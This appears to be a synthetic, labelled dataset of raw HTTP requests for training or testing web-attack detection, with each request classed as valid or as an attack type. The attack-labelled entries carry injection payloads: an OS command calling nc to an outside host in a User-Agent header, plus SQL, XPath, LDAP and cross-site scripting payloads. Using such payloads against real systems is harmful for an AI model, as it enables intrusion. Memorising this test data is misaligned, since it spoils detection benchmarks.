UA-Color: color16
UA-Pixels: 5788x525
Via: 8.1 186.131.16.222:13, FTP/2.1 166.88.243.107
Transfer-Encoding: gzip
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 122.146.226.211
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44153
Start - Id: 12312
class: Valid
GET /pShezg52VR4l.4z8CGaZ/fWIz/cO4rQX1i/cTo/la@/iv1beNix.nsf? HTTP/1.1
Host: 83.28.122.115
Connection: keep-alive
Accept: text/*;q=0.7, video/*, audio/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 49.9.133.115
Cookie: gsHktTnjeTR=tceyses;etlhgnlbyfoxM=1ahtaccesoza7rm1ae=t:de;dn7woymt=%2ru ]Ao0all
Cookie2: $Version="6"
Date: Thu, 20 Aug 09 16:04:31 GMT
ETag: W/"Gz4FNx2VD@6VTvFZn3"
Expect: 100-continue
From: iman0m@blrqt7ti.gov
If-Modified-Since: Tue, 12 Jun 07 21:36:25 GMT
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: "0GhMralg6KXY8.nNc"
If-None-Match: *
If-Range: *
Max-Forwards: 815
MIME-Version: 9.2
Pragma: tt=IhRoae
Proxy-Authorization: Basic ZWZoSHAyYzpkbjh5ZTh5eA==
Authorization: NTLM TW5wc2F0Y2VhaGVhb3JzdG1hU2VlSXNuYm5lSG51c3RtNWlzcHM=
Range: 53-93,362543-
Referer: /tisuso/derosa/ioylyre/fehmit.php3
TE: trailers,trailers
Trailer: Host
User-Agent: eieib (0rks.oX@ye; e_uSkJ; eazb-_X3x; eKbgI9jw_)
UA-CPU: 68000
UA-Disp: 3555,603,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4392x5610
Via: 5.8 199.127.195.100:19, e1eGsw/2.4 www.otrdeOye.htm, ub9/9.3 www.Ruoduwta.jpeg
Transfer-Encoding: gzip
Upgrade: god/4.2, see0e0/3.6
Warning: 665 24.150.246.12 "aeenoduraB" 
X-Forwarded-For: 55.96.214.140
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12312
Start - Id: 43608
class: OsCommanding
PUT /aHrdpdtiabgl5mumAsk.shtml? HTTP/1.0
Content-Length: 307
Content-Language: Itlhm
Content-Encoding: deflate
Content-Location: /dv1w/nxratj/os8n0/3lCjaa/N7lur.sh
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 02:02:00 UTC
Host: 221.125.49.194
Connection: etsu
Accept: */*;q=0.8
Accept-Charset: euc-jp;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.9
Date: Wed, 28 Apr 10 10:44:36 GMT
If-Match: "uzdwiKBiH9vzeXETC"
If-Range: Thu, 28 Dec 06 07:45:19 UTC
Authorization: Digest response="4a0Bf2cD63A7EB4e2dFb7cCB0968FaDf"
Range: 29587-,-5463,921-
Referer: http://www.bhgdT.it/veeno/hfote/XEopIaE.mdb
User-Agent: %0a    nc   www.aselorisil.com    80     ;
Transfer-Encoding: gzip
X-Forwarded-For: 84.166.3.208
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

8oharkfjt1is=bliaiaAh&ilp7cm=52290&Hshkpujteta=37&7pME9Z.OaN.=mochaD3a&eal1w=eaiAi&ecasarino=618&iselao3ho=hujnasowgt&hmdeddu0=spUu&iaueeb5tEoef=<&heLohvrpesteh= &O@kiH0dtlreo3GcIryy&d.doo3DMoDX=shtacces&ancrhlfLaeesrfp=a2 HhlIoSe )q]jR/2oa&tufeem=aEJyr_ptaIg&2LHvt3vTQSI=damsne qtm>t&aeoiod=5

End - Id: 43608
Start - Id: 30496
class: Valid
GET /SnlcHsbct4aOln0as/lHutrtemHe5jf6/f6WTZ/eh/rstdns/b80Z72Nb4wnpi3rbZ/iuuge/i7ndnenbo2mcae.html?prymr=0477183&nvyvtefd0e6riay=lt%40UaCerndocumentalliyr&0g=rrn1me7 HTTP/1.0
Host: www.rddb4yWwl.uk
Connection: close
Accept: application/rtf, audio/x-wav
Accept-Charset: cp-950;q=0.9, iso-10646-ucs-2;q=0.3, windows-1254;q=0.7, windows-874, iso-8859-7;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 1.40.141.250
Cookie: h4ei8onno=veunin;b0qSrhrnnoc5j2a=94235;ysTIee8=?Oeln4eorI)lYei
Cookie2: $Version="6"
Date: Sun, 24 Feb 08 18:36:10 UTC
ETag: "ibb5UKHCzgvT8Emm"
Expect: unneeey
From: l8ngh@nEai2iouaS.be
If-Modified-Since: Sat, 23 May 09 15:31:35 UTC
If-Unmodified-Since: Sat, 10 Apr 04 03:46:14 GMT
If-Match: *
If-None-Match: "@Mi6reWATWl30Lo1LQyE"
If-Range: "i7Fa_U6crU7eB3HjgYrL"
Max-Forwards: 479
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic RGl3dzp0c2lldEk=
Authorization: Basic YWZpZWVzczpxbWFzb29zbw==
Range: 97838-13,949-
Referer: /jtiN/ltsr/zeXrfo.bin
TE: trailers,deflate;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 1.9; oe-br; rv:1.8.8) Gecko/84835136
UA-CPU: x86
UA-Disp: 273,999,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 710x3564
Via: HTTP/0.2 188.14.120.186:98130, 1.4 www.tuiuoTa.htm
Transfer-Encoding: compress
Upgrade: i2lasb/6.1, sudhu/0.8
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30496
Start - Id: 42587
class: SqlInjection
GET /or/TGsR/e9.nx-DwPA2IIeeg/dZ81qibGaRtogHFRZjSg/niad/ttembr006ldLi/ls6k8M-G/ivBLi8Sp5.tGU05QV2Wi.dll?daajaaoerim8=mw8oul8K&wnetcatigcK9YM=lktwnatsoThd&eioe2Ennht=45nr_PtSbeUR&gcp7e8eneen=73&nn5oHdoTitej=%3B+++exec++get_cust%28++%27x%27%27++union++select++object_name%2Cobject_type%2C%27%27x%27%27++from+++++user_objects+++where+++%27%27ay%27%27%3D++%27%27++%27%29%3B&OencvMwt=satnp38&lop=o3%7Cyiframea&uxRumrercDw0=Buau&zozwo4tirsl=oeaerb%2F%2F%3C%26%3B&otabtimouqd1=niE2iBihQEcT&agIisdn=dtIuaStnecaDe HTTP/1.1
Host: 16.179.66.110
Connection: close
Accept: text/plain, audio/*, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: woa-iolcbm, 3iTaumir-z, Us8temht-e5harf;q=0.4
Cache-Control: max-age=52774
Client-ip: 218.19.16.82
Cookie: 8yowoeecbsthm=tV9frie;eiebnaaiubdhu=5;stu2saeqaeko=9235
Cookie2: $Version="502"
Date: Sat, 21 Jul 07 10:45:22 GMT
ETag: "pq7bnbHi0dHB0FN"
Expect: wshtlUla
From: tmTstilr@oerx.it
If-Modified-Since: Sun, 04 Apr 04 22:10:17 GMT
If-Unmodified-Since: Tue, 06 Oct 09 08:30:38 CET
If-Match: "X940-vBvQ9LT@e8h"
If-None-Match: "@ydKyN3ohPDqZvu."
If-Range: Tue, 26 Oct 04 06:49:16 GMT
Max-Forwards: 89
MIME-Version: 1.0
Pragma: 02so3=o
Proxy-Authorization: Basic Y2llZ2U6bml0aWQ=
Authorization: Digest realm
Range: 971-
Referer: /tsegxe/atino9e/aupkh.zip
TE: chunked
Trailer: From
User-Agent: nenrenbdrwa4
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4922x3138
Via: 0.0 www.ror9uA.shtml
Transfer-Encoding: compress
Upgrade: a3aitm/8.3, pebmu/7.7, atq/8.0
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 7047593
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42587
Start - Id: 25538
class: Valid
GET /ai58eTgorfSNachin/ssM/Nneietmtmwkwu.bin?jhZ0wTx=tvxbetween&kssdofn5pl=eyler&cbturpsnu=oX8RovIXj&selecthxDe8q0=389&jOOAl=905&paeatqYaotNv=8&ihl3uhsilalen=446483&ssbason7=82470061&onrsoG=nls7r8oaf HTTP/1.1
Host: 99.164.73.55
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 248.143.44.71
Cookie: nics49dopo9=]tmailo;1bMJqIjx=n1ZRy-;allhyzarEeab=t0pOLSNty@v@;BsCiio=y2u7ie
Cookie2: $Version="35"
Date: Wed, 26 Jan 05 08:27:24 UTC
ETag: W/"QnmIEfl0nYkxYvxbp"
Expect: m1u7ind1
From: ba6a@Eruaatrodo.be
If-Modified-Since: Sat, 31 Jul 04 09:47:44 CET
If-Unmodified-Since: Mon, 09 Feb 04 05:18:00 UTC
If-Match: "x4b1N2EzxfU86Yu6"
If-None-Match: *
If-Range: *
Max-Forwards: 2974
MIME-Version: 6.4
Pragma: iriRSti=2
Proxy-Authorization: Basic bm9yZzFyOm93c28=
Authorization: NTLM YWV0dXhTdGd5aHk5YWVlSmxjc21yc3Q4ZWR0YWRhZXNzeg==
Range: 9-,-76849,526527-658
Referer: /oDtds/e4As6e/srcleng4/8cng.dll
TE: gzip
Trailer: Date
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 0.7; ah-nr; rv:8.6.1) Gecko/14635422
UA-CPU: MIPS
UA-Disp: 0510,736,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9692x597
Via: 4.6 208.168.251.63, n7etr/1.8 38.232.146.200:57
Transfer-Encoding: gzip
Upgrade: tOa/0.8
Warning: 249 www.rjnEOio.gif "iaol" 
X-Forwarded-For: 229.243.216.50
X-Serial-Number: 5960932931614
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25538
Start - Id: 48570
class: XPathInjection
POST /r@.3RRiMvOYBqlkO7_9/dwu7cDeiNckalejdni/rhV2SaxGFEOGHv/lz6HHvRnh-8xm8M@/rs99Ig/x792z-i1c7F/xRgBZ0.sbhb/rEs/pe6heRoii.msf? HTTP/1.1
Content-Length: 99
Content-Language: nve4n,n,mombel
Content-Encoding: identity
Content-Location: http://t8baAn.fr/92ivre/yD11Enar/heon/lszfu3.msf
Content-MD5: czRzc3plcHB0b2Izbmg3bg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jul 07 15:24:11 UTC
Last-Modified: Tue, 16 May 06 13:14:40 CET
Host: www.emnpfEahLs.gov:071
Connection: keep-alive
Accept: image/png, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 5.57.77.191
Cookie: LRrvarVdOO=n;gtP=651976;RYdKBe=35;H6e@B.PJ=1lTh6mh
Cookie2: $Version="071"
Date: Tue, 15 Jul 08 22:09:49 CET
ETag: W/"bZO8O_UnUbgrxB2"
Expect: oaln=atraiu;nomtiAaz=iaeh
From: w3nw@eoeld2.be
If-Modified-Since: Tue, 04 Aug 09 05:48:08 GMT
If-Unmodified-Since: Tue, 01 Aug 06 02:02:15 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 260
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic NGFpOXJ1OGw6cnR0aHRncg==
Authorization: Digest cnonce="rlweenE"
Range: 9027-,6479-,26031-
Referer: http://www.cneetttf.biz/10ea.msf
TE: trailers,gzip
Trailer: Date
User-Agent: 0iLOkNNyS http://www.da3nie.de
UA-CPU: StrongARM
UA-Disp: 488,4156,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 0026x0337
Via: yesf/9.0 202.131.186.135, FTP/7.0 215.155.32.39, 2.0 www.ponisjei.jpeg
Transfer-Encoding: compress
Upgrade: tht3/1.7, Wquod/3.6, gppbhH/7.6, oiu/0.5
Warning: 024 102.167.137.67 "nvpacNsesceoTbreyoUd" 
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 63432598525498098
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

nD1t4=gen8ta'    or  path/child::node()[position()=N] or 'tnyn'  =  '

End - Id: 48570
Start - Id: 28313
class: Valid
GET /oZyNfjVhZq/yeeRtwhAgiotLerhsBM0/No/qeOeedorss/ne9V25ARuybBExhV2Acg.png? HTTP/1.1
Host: www.RdestZ.com:13
Connection: keep-alive
Accept: video/*, text/*
Accept-Charset: iso-8859-9, iso-8859-3;q=0.9
Accept-Encoding: identity;q=0.5, compress, deflate;q=0.2
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 68.121.132.185
Cookie: m6Wg4Lv=nLlp;otAsteken5ht=go9;zEumstdtN=ilhbhPi9;gTv0HoQEnupdateKY=stid;oar==0b;aGee=2t
Cookie2: $Version="2"
Date: Mon, 30 Jul 07 12:42:04 GMT
ETag: "7urVyEam9oA659qX"
Expect: 100-continue
From: trodmys@wuil.gov
If-Modified-Since: Sun, 05 Mar 06 22:57:20 GMT
If-Unmodified-Since: Fri, 21 May 04 12:14:33 GMT
If-Match: "Yq8kKN.oP@PE4vGWLa"
If-None-Match: "ZcNkib8HyclwqbvJ"
If-Range: "bd0EFxXQB8yF4tDJnt"
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bGFpdG9zZDpudHJuY2I=
Authorization: Digest username="N6fybtit"
Range: 291-579867
Referer: http://oat2n.cz/bkRFe/rgaoei/elzrom.php
TE: gzip;q=0.4,gzip
Trailer: If-Unmodified-Since
User-Agent: eOmei (9JOmj-E2Y)
UA-CPU: x86
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 680x9650
Via: dtGt/6.0 215.68.96.86
Transfer-Encoding: gzip
Upgrade: amcAh/7.2, emad3/8.4, oatab/2.4
Warning: 319 www.tnkspl.jpg "nninerrhxaodk4k1ed" "Fri, 18 Aug 06 18:00:20 GMT"
X-Forwarded-For: 198.61.218.144
X-Serial-Number: 353988782
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28313
Start - Id: 15318
class: Valid
GET /iA/s4ftXG@U/rE6utrs8itorn/le6dC7ttafwefybeC/Fhj81Cf5ietcjGl/jn_wP/tsjrttgf6yodmdloee/d7o/ip1PlKknN/aon/dIDd82JuF.34aefo.kqB/nthi.sh? HTTP/1.1
Host: www.hneafdes.be:80
Connection: estrgsb
Accept: */*;q=0.8
Accept-Charset: iso-8859-1, windows-1254, euc-tw
Accept-Encoding: identity;q=0.8, identity;q=0.4, deflate, compress;q=0.8, identity
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 31.24.207.57
Cookie: Ereednamvrepwu=aal;sa;sand4op8=xAz;etfithe=oqvNl.hv6FjF
Cookie2: $Version="3"
Date: Tue, 29 May 07 12:00:53 GMT
ETag: W/"wC8rBWuKAC-CzWi"
Expect: h3o1=tornearr;u7u5=u3eAi
From: sbR2u@rgtt.st
If-Modified-Since: Tue, 18 Aug 09 13:38:36 CET
If-Unmodified-Since: Fri, 08 Dec 06 20:31:47 CET
If-Match: *
If-None-Match: *
If-Range: "7BDRpFQ_2uZ46zLU_bn"
Max-Forwards: 167
MIME-Version: 7.7
Pragma: hJIlre='9rxtr'
Proxy-Authorization: a3ashh fyuhrze=uoTtep0T
Authorization: Digest nc=fceb7A49
Range: 604-0,1-54,-12
Referer: /9Eem.sh
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/1.2 (Windows; U; Win 9x 4.1; ec-fs; rv:7.7.7) Gecko/98311543
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9424x098
Via: HTTP/7.0 41.226.1.249, 5.6 10.205.113.65
Transfer-Encoding: gzip
Upgrade: 3hc2/0.6, 3ner/5.3, i8e6ti/2.6, hoN/8.2, aise/6.4
Warning: 649 149.116.106.106 "Fb6sieGmla8" 
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15318
Start - Id: 29334
class: Valid
GET /cY2OfbhT/xbJ4Sfh6kselect/rrO0n.cgi?pcfLiPmyetoEr=fc%2B0d&oei7geFomhayil=jr%24h%2B+nanduoaC8vh&GdXcMRK=554&eetw=Eeet&zortan=tos&se3vzt3adfkno6=dy&TuriacrtoaXeEr=%27%40OI%3A&smhftt2BenABx=43476381&tah3sn4xneyyia=y+lRvhgcmdsrw%3D9&Owaeot0nqwqt=erf4egxdbsk&ozedSnwtb=%26admin+eaOnullodt+%26&0br=1876785&unxoijsh=wtioqu HTTP/1.0
Host: www.ekntu.de:297
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, deflate;q=0.0, gzip;q=0.0
Accept-Language: hlwnnIer-te;q=0.7, dsglmo3i-Onj70di;q=0.6, r-sreupg
Cache-Control: max-stale=32
Client-ip: 152.42.80.93
Cookie: DVUPtL@.=9bYzuHv;zzBopenb9YL7lO=nodt
Cookie2: $Version="3"
Date: Sun, 03 Jun 07 08:45:49 CET
ETag: "EVn78D_j2F_Ci2MjUfz"
Expect: dhpadts=lStoav;izatsiw=osstkat
From: yttt5iy@rcto.com
If-Modified-Since: Fri, 09 Jan 09 16:16:31 GMT
If-Unmodified-Since: Fri, 21 Sep 07 09:08:11 CET
If-Match: "8bAs7@pemgnqiCw"
If-None-Match: "coYTFd@JIfeAJ3V40F"
If-Range: Thu, 25 Jun 09 22:45:09 UTC
Max-Forwards: 55
MIME-Version: 2.8
Pragma: d=aeHetee
Proxy-Authorization: NTLM aGdmeUVjdG1SZHRpNXRldWVhbm11b2NoN3JuaXRjdXVyZW9l
Authorization: Niel mrshgc=q5tc
Range: 549983-,-11
Referer: /Raeea.mdb
TE: chunked,gzip,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.0 (X11; U; Unix 5.3; 4e-ln; rv:2.9.2) Gecko/78307172
UA-CPU: StrongARM
UA-Disp: 575,351,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 247x1698
Via: FTP/1.1 98.155.72.134
Transfer-Encoding: compress
Upgrade: erNrnt/0.5, c2isms/4.7, 5eu4/2.1, W0yEk4/0.3
Warning: 707 229.233.88.113 "toegchfersr2gftmiE" "Sat, 27 Jan 07 13:21:51 CET"
X-Forwarded-For: 4.80.245.104
X-Serial-Number: 892680378227754
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29334
Start - Id: 47986
class: XSS
GET /lzw1r-UFlD-w@KHscCFv/te-b_WL0rp549nb/TN6d/7@/nHXCmhOf2M9pJL/kI/xhhavingK51cNJgPa/u2HiuMolbOsyEyDr/bhy/u_hVo9TkkSAT/M6t0r1tern0.js?rdbhreeaen3e=44525&lienepuxyp=ljOe&M7QQO-oTOJ=%3Cimg+++++src++%3D+%22++nianannani++%22onmouseover+++%3D+%22+++%5Balert%28%27slnlsadfek%27%29%3B%5D%22+%3E&5tEQae=n2azi1imiotmaht%5Dcine&o_HRA=xRqiwf9tflsEnetcat%40y&gxniepnetnosl=1566&n9ca24iiaelEt=sdhbt-+nItrr+Ay HTTP/1.0
Host: www.eTasf.ch
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: jtsydrt-s;q=0.9, sctfrhek-sroo;q=0.9
Cache-Control: mpif=e5
Client-ip: 200.176.81.45
Cookie: id6hre1Nsx=i9;oc3aR=soetorthkcnEg;bbgsoundPwinntmQobjectayu=4
Cookie2: $Version="140"
Date: Fri, 03 Oct 08 05:59:09 CET
ETag: "bB6SVaQ0NFgpTlezIQ"
Expect: lFikdnif=fhohwa1
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Mon, 28 Sep 09 13:17:24 GMT
If-Unmodified-Since: Mon, 07 Aug 06 06:55:04 UTC
If-Match: "ZxNYZaRpu7LLw@b_"
If-None-Match: *
If-Range: Wed, 30 Dec 09 12:35:54 UTC
Max-Forwards: 3
MIME-Version: 8.2
Pragma: EagllIad='siAl'
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic cTBzbzpoaW9scw==
Range: 147-9,-924229,1-59450
Referer: /keaneta.jsp
TE: chunked;q=0.8,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/7.5 (X11; U; Solaris 3.6; xR-ic; rv:3.0.1) Gecko/36537161
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: FTP/5.0 54.23.240.57, u8torl/5.1 21.169.15.46, FTP/5.9 www.eror.jpeg
Transfer-Encoding: identity
Upgrade: ncS/0.9, oneft/1.4, g2ddat/1.2, wrNtr/6.4, r7ss/7.4
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47986
Start - Id: 37392
class: LdapInjection
GET /mF9mebWmjPPa/h7gboot.iniMF.html?TtdhnsPqelBHoeh=tZFBNvT%40CdBr&ir6mN=rThttped3doAlibhlogalibet&ho0qocabtgyif=frboot.inie25ykoCta%7C2b&e5reaetWNiailsr=t&mspaa=rreLni%29t%5Bb7t&nelhdinse7Tci=%3Df+etdrsi HTTP/1.1
Host: www.sOeeeihdt.it
Connection: 2qoeErpd
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: )   (    |   (displayName=had*)  (name    =  had*  )( mail=had* )
Accept-Language: *;q=0.9
Cache-Control: max-age=91
Cookie: eShn8eA2ngfnim=41zimTfcto;ntvuphjeHnu=atinputi 36e
Cookie2: $Version="61"
Date: Mon, 28 Apr 08 22:38:53 UTC
ETag: W/"WKZgPV22yOjLYYvu-I"
Expect: ron5eh
If-Modified-Since: Tue, 22 Dec 09 03:35:15 CET
If-Unmodified-Since: Tue, 01 Feb 05 03:13:50 CET
If-Match: *
If-None-Match: "ZrteGa33_COudmjA"
If-Range: Mon, 05 Sep 05 06:02:19 GMT
Max-Forwards: 1
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: lmrt hidHn3=naUlw
Authorization: Digest qop=auth
Referer: /eubbx/tS4feao/shlh/ajsqieb/iia767.zip
Trailer: If-None-Match
User-Agent: ajd8ieaba (njmm4bTvj; rKHt2Rm2)
UA-CPU: 68000
UA-Pixels: 7518x4313
Via: FTP/5.5 www.aipyd.htm
Transfer-Encoding: 2nsy
Upgrade: h0oea/1.9, gpelrj/2.8
Warning: 838 www.Iere.css "nte1bgten" "Wed, 06 Sep 06 04:52:53 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37392
Start - Id: 5308
class: Valid
POST /556cg-punusrQ/ekuhHzE51krIN/Rucevtgdx4b7b/snTwvm8yPo/FUpsm6VIgoGuAQ/rRFVP.pdw1UbdqCJ/hof05uagnpdxt9r/feysamtS/t@aNIdjMI.xUdhr.htm? HTTP/1.1
Content-Length: 248
Content-Language: kMner,e
Content-Encoding: deflate
Content-Location: /exn4enlx/hehr5e.asp
Content-MD5: TzJ4YWVlbGFobW9uYXlFMg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Apr 05 22:12:13 GMT
Last-Modified: Sun, 03 Feb 08 08:49:16 UTC
Host: www.ldOs.gov
Connection: ini3a
Accept: */*;q=0.7
Accept-Charset: x-mac-korean;q=0.4, iso-8859-4, iso-8859-2, utf-8, koi8-r;q=0.3
Accept-Encoding: compress, compress;q=0.6, identity;q=0.1, identity;q=0.2, gzip;q=0.3
Accept-Language: ogap-ap;q=0.9, nlio-tpAquiet, ureuiM-idona2;q=0.2, anoe-6nriA2i;q=0.9
Cache-Control: max-stale
Client-ip: 32.242.144.60
Cookie: lCrRD5ECN3tohUu=sRajV;UK35x=e;am= t8261lfyscriptuus;bmGZ1XY=8;uf6window.openQN6ftp=nD1_59yU
Cookie2: $Version="7"
Date: Mon, 20 Aug 07 05:32:56 CET
ETag: "I3nHz0hbo5l84EWVABt"
Expect: enfl
From: naRoHav2@prVrEyldam.com
If-Modified-Since: Wed, 12 Oct 05 06:22:14 CET
If-Unmodified-Since: Fri, 30 Apr 04 08:04:08 GMT
If-Match: "6KjgofSuT.IWiglVQ"
If-None-Match: *
If-Range: Mon, 30 Nov 09 21:10:39 CET
Max-Forwards: 35
MIME-Version: 6.3
Pragma: m=o
Proxy-Authorization: Aaaf lnogj4h=etlars
Authorization: wWdesR siee=oenao
Range: 8822-34,539805-
Referer: /pnbtc/pnt4eue/sar6.jsp
TE: gzip;q=0.2
Trailer: If-None-Match
User-Agent: oXjzP7 http://www.Ay9b5.it
UA-CPU: 68000
UA-Disp: 370,737,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4339x4945
Via: 3.3 www.s3nnqsg.js:512, 9.0 www.thpltx.shtml, 3.0 www.diAo.css
Transfer-Encoding: deflate
Upgrade: ecp/2.5, rdiiad/1.4, eindq/0.0
Warning: 218 43.28.61.59 "ovEe0ysqedar" "Wed, 21 Apr 10 15:43:26 GMT"
X-Forwarded-For: 194.87.49.44
X-Serial-Number: 6090087986849
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sVndrsitmtey=l&4bbd7strhdeiimn=0516140816&xts91srleeh=xp_mesCv&Lecea=oiRymida&AHe=urg&rw=6844&KWN6pT=0352273&ssdOPY=2&KdB9w_=r  t&gaqho7la=2009325&oAgroup byRKoY=04&L.9anddeWw=~o@&gddy=phpehaccept&zr2rezoodsrbe=-iqsh&hntso6rr=)tcehu3s]uCemn

End - Id: 5308
Start - Id: 46538
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: 172.45.16.119:80
Connection: close
Accept: audio/*;q=0.0, image/gif;q=0.2
Accept-Charset: windows-1255, x-mac-turkish;q=0.4, x-mac-turkish;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 4.189.24.120
Cookie: srnblaIaksxt=1823
Cookie2: $Version="896"
Date: Fri, 04 May 07 02:33:26 GMT
ETag: "kawAb@1-1knM6hZcsl"
Expect: 100-continue
From: ns7rogjc@npah.it
If-Modified-Since: Thu, 27 Apr 06 01:13:23 CET
If-Unmodified-Since: Wed, 24 May 06 17:59:03 UTC
If-Match: "9oYjg2GYAoSOmeeT-f"
If-None-Match: "8L9FnjWtU@u@r@3g7l.c"
If-Range: *
Max-Forwards: 850
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM YVNldHQ0aEVhZXduaDNDaWM5ZGdlOWNlU3BwZXBlcmFhcA==
Authorization: Digest nc=d4Cc5cDf
Range: 545941-
Referer: /0y1me.cgi
TE: trailers
Trailer: If-None-Match
User-Agent: l_GQ0R http://www.wtanatja.com
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 139x000
Via: 6.7 59.126.144.8
Transfer-Encoding: gzip
Upgrade: ier7qt/0.9, a9hc/3.6, ins/7.0, tttS5/5.5
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46538
Start - Id: 9587
class: Valid
GET /Nri4FQRW.php?xp_ad2Ot07PT=8eednLnao5erhsn&rdwb6PfarmerqzO=705748343&6@execMEpositionMd6dco=on+czeota&l-5bmEg3=1020&omv=cntmkNdorMogh+gH%27+ib&NsYuV4d=%7C%24h+&h1nrnnmff05mik=dpOy12Xrf&dn0wezC1eqaa=2349&etaIiscaato=4200512&2iressze=upndi8beRiadteun&sJ0Ef7KSDperlo7=s&sL=4797 HTTP/1.1
Host: 202.107.54.42
Connection: wsHpad
Accept: */*;q=0.4
Accept-Charset: x-mac-chinesesimp;q=0.2, gb2312, windows-1250, iso-8859-15, hz-gb-2312
Accept-Encoding: 
Accept-Language: qc-rye4oi, aandfdr-ro, tedhidNr-seca;q=0.4
Cache-Control: only-if-cached
Client-ip: 108.161.169.186
Cookie: ahlmso6s=atzntutiOu dtt$;sRw0cvbnhoAed=ymbcnetcatt dhClnbtlacei
Cookie2: $Version="085"
Date: Fri, 06 Feb 09 24:52:29 UTC
ETag: W/"jNUQqj0@oyyO-EFGzPbC"
Expect: 100-continue
From: eSsaDtn@crno.be
If-Modified-Since: Fri, 18 May 07 18:03:46 CET
If-Unmodified-Since: Tue, 07 Dec 04 18:32:46 UTC
If-Match: "atcMlmXxdHdXXZjdeB"
If-None-Match: "3_sf3fa8DMb2IqCl"
